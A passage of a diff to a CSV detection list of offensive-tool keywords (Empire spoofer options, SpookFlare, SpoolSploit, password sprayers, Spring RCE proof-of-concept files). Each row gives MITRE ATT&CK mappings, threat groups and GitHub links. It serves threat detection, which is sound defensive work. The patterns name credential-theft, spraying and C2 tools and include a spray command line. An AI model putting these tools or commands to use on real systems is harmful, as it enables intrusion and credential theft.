Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*SpooferRepeat*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*SPOOFING GROUP POLICY TEMPLATE LOCATION THROUGH gPCFileSysPath*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","90","6","2023-09-10T10:59:24Z","2023-09-01T08:13:25Z" +"*SpooferHostsIgnore*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*SpooferHostsReply*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*SpooferIP*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*SpooferIPsIgnore*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*SpooferIPsReply*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*SpooferLearningDelay*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*SpooferLearningInterval*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*SpooferRepeat*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*SPOOFING GROUP POLICY TEMPLATE LOCATION THROUGH gPCFileSysPath*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" "*Spoofy/spoofy.py*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" "*SpookFlare*","offensive_tool_keyword","SpookFlare","SpookFlare has a different perspective to bypass 
security measures and it gives you the opportunity to bypass the endpoint countermeasures at the client-side detection and network-side detection. SpookFlare is a loader/dropper generator for Meterpreter. Empire. Koadic etc. SpookFlare has obfuscation. encoding. run-time code compilation and character substitution features.","T1027 - T1029 - T1218 - T1112","TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hlldz/SpookFlare","1","0","N/A","N/A","10","925","201","2019-05-08T09:03:45Z","2017-11-13T17:22:12Z" "*spookflare.py*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*spool_sploit.py*","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/BeetleChunks/SpoolSploit","1","1","N/A","N/A","6","533","90","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z" -"*spooler_check*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*spooler_check*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - 
TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "*SpoolSample.exe * *","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","10","7","635","105","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z" "*SpoolSample_v4.5_x64.exe*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*SpoolSploit/*","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/BeetleChunks/SpoolSploit","1","1","N/A","N/A","6","533","90","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z" 
@@ -17195,7 +17378,7 @@
 "*SpoolTrigger.x86.dl*","offensive_tool_keyword","cobaltstrike","Spectrum Attack Simulation beacons","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas/","1","1","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z"
 "*SpoolTrigger.x86.dll*","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z"
 "*SpoolTrigger\SpoolTrigger.*","offensive_tool_keyword","cobaltstrike","Spectrum Attack Simulation beacons","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas/","1","0","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z"
-"*spray* --recon *.* -u *.txt --threads 10*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","10","8","795","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z"
+"*spray* --recon *.* -u *.txt --threads 10*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","10","8","797","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z"
 "*Spray365.git*","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","1","N/A","N/A","3","296","53","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z"
 "*spray365.py*","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","1","N/A","N/A","3","296","53","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z"
 "*spray365_results_*.json*","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","1","N/A","N/A","3","296","53","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z"
@@ -17212,84 +17395,84 @@ "*SprayingToolkit-master*","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1352","268","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" "*SprayingToolkit-master.zip*","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","1","N/A","10","10","1352","268","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" "*spraykatz*","offensive_tool_keyword","spraykatz","Spraykatz is a tool without any pretention able to retrieve credentials on Windows machines and large Active Directory environments.","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008","TA0003 - TA0004 - TA0007","N/A","N/A","Credential Access","https://github.com/aas-n/spraykatz","1","1","N/A","N/A","8","737","126","2020-06-20T12:14:00Z","2019-09-09T14:38:28Z" -"*spring_framework_malicious_jar*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*spring_framework_malicious_jar*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" "*Spring-cloud-function-SpEL-RCE*","offensive_tool_keyword","POC","RCE PoC of 0-day Vulnerability found in Spring Cloud (SPEL)","T1059 - T1210 - T1507","TA0002 - TA0040 - TA0043","N/A","N/A","Exploitation tools","https://github.com/chaosec2021/Spring-cloud-function-SpEL-RCE","1","1","N/A","N/A","","N/A","","","" "*spring-core-rce*ROOT.war*","offensive_tool_keyword","spring-core-rce","CVE-2022-22965 : about spring core rce","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/Mr-xn/spring-core-rce","1","1","N/A","N/A","1","54","18","2022-04-01T15:34:03Z","2022-03-30T14:35:00Z" "*springFramework_CVE-2022-22965_RCE.py*","offensive_tool_keyword","POC","SpringFramework CVE-2022-22965","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/Axx8/SpringFramework_CVE-2022-22965_RCE","1","0","N/A","N/A","1","76","17","2022-04-01T12:08:45Z","2022-04-01T04:51:44Z" "*spyonweb-get-rootdomains *","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 